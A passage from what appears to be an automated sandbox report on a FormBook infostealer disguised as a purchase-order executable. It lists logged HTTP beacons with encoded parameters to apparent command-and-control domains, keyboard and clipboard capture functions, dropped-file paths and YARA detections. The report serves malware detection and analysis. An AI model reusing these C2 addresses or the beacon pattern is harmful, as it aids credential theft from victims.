F6z4=rytY7hq2k8I2EX51tsD6~0uSRrLyz0Tu4mFLvvwI~xkzhEdeJpJfm6eRd03ShGel1EfT3vj8ErFzB0SU2ne38QLWoVIK~FNs5XQxJ_nf~cuR(NcTJ-TOzGKDXds-T9rJgdv3KzrQXrPiZ2~dsB3TiZ6XMBPodJM9Yyw16HwqlkN2XHjohyrv3NbanPHheBkrFzpSjQIxWBCvS0MmxoAwHA2GJrTpvpKQXDrTg0XV3k7XokPiCsHkTskMoI86aYrT2a1sjTaeJRGkMmv1QXmbRgdbbaeUktlX0afd8nSWZmwUGmQ3lAHJW7zrdL7GaCOqq_ZD1pmp7_scafP9fZ8GYN5HHHG6Vba-wqxS0GUff1dH7vL5ph3xlJSLZM4JZu38i7Nil6pgH9Fn0533cQ).
          Source: unknownDNS traffic detected: queries for: www.oonrreward.xyz
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.oonrreward.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=mwF44ViOu9spAX9yiKWO/GCmf5D0pm7R930/p+8373gvxGpTfL4o/Lm9AHizqU6H72eF1eWgDLpzZ2SfuF6Kyw289k0D2VxhyA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.gmrsnodes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=q+GqSbkO5kqO+W9u2R8uyv/azK/Tyw9Ktq6EIVL87IABA33EfP0KANVapKUQlEGAPHMNZ2Czo2C9EtWkfzzg2b9ydKIDbcUulA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.dailyheraldresearch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=XxObD+bozu8R8o86HZokIAwRDcTSUgt1X0zVs8jY2xx2j7amGX2Nanqc4HjuSpD/F/TSiqNoyiNwTcXhTU7ob6qQALfoq6EoqQ==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.publickit.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=nJLDtYwD0af/ePmsJ0ZKjiSVJI8rGVPKc+UQspc6K5yuMKQDKTWfrb6tVbro5/Rq1DJ6W8y/y+8M88qCUODrzxtLw2C30JMyEA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.lee-perez.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=pynBU+gmcVJLvmAk24XYTH3CuEH61wNq2RizpB0aNcQM45kGiq+MbQwB99t5gTqC+tvIVg5qQAlCnSYFpOBmFRnmyN3XSGsj5w==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.frwqc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=SKemUsRCc/T/1VtJMmoBZUTfzvZVAKOrpHPFHv5bIcLS1NPOIJ3jWavklE8DT12a+oeWOwZfdDSidPGYCemgiB/muCJBu0rQaA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.tommy57.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=Mu7XrmbNuBpRkVuoTBGU/iHqS/OhVA7Any/uXbqYT12baRfdD/rxJiFT6KJrK4J1cV2pSA20UCfshAzQrgjlnBPfig9iswk20g==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.700544.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=la9UBuDbTkNYLSjTdKhHvd+t7tYwPiF7FtZOQELnOBzejFZlEJsWuQ55NoeYz7TqoHjnmCP3NdRIHdLBoOXytpXMXLmthCtowg==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.porggiret.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=IYAlNlE+FJHaxy8xKQwy2r7+8XL3SaTnyfpqtFACBxvA1+IYQm/X+/KTYzdsJPpQzBa/f1IulPzZtkKHtHHlpgqy4oXa9op1jw==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.tobewell.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=yeGgPnkUyrtnR7ayT+iAJkQi5P+hLqfzRu7/UIGlFriReHTN1+d7DIiWZVVmKJ4cvvB3dwEDWmLuBMYDpMvfxEUSQC8X9wPCmA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.new-thinking.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=19Acn/cRxsS2hMIvbksqz2Fo9/tvE3PmoTWmDY67F7eOm0DJL1plqZyOKvwSm3g2XK4MIkQK6hC8KTphNB2J9vZOQC2YpVwH6g==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.ybkos.linkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=6mtkb9sgLdU5EKgBox+sPzjX7gz7/N2rxrRH87049IJ0dh9Tn6WPD5ftVfyzJnBGA3PJpfJHiW/BJrwPQwZWSWvRAWejN4CLLw==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.bookmygennie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=qV5DC7gvSDrvRRGewn1q/I/EwjqoLGbs6Pm0OHOL9iW03iXh+4kaxlrb2hUer6xMCUxzC2FjXkfJjvQV3jFRWlDNN37fVrd03A==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.amspustaka.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=4ec4fK6CMrtHuja3pViXkl8dlfKAbA0cl+B6ZD+yu2XjTt2h0hV8coMCjgRVKURuW2bGAgNBkAmkGWEjBIBjWi0t+MmK3uNJiA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.spirituallyzen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.oonrreward.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0024ACE0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,1_2_0024ACE0
          Source: rubthqnwyfue.exe, 00000004.00000000.330517070.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0024B870 GetKeyboardState,1_2_0024B870
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405125

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: jaxdij.exe PID: 5360, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: New PO-RJ-IN-003 - Knauf Queimados.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jaxdij.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jaxdij.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: jaxdij.exe PID: 5360, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 476
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_004063330_2_00406333
          Source: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exeCode function: 0_2_004049360_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_002418D01_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0025A9EA1_2_0025A9EA
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_002435201_2_00243520
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_0024C5001_2_0024C500
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 1_2_00248EB01_2_00248EB0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_002418D02_2_002418D0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0025A9EA2_2_0025A9EA
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_002435202_2_00243520
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_0024C5002_2_0024C500
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_00248EB02_2_00248EB0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004012B02_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004218982_2_00421898
          Source: C:\Users\user\AppData\Local\Temp\jaxdij.exeCode function: 2_2_004221DA2_2_004221DA
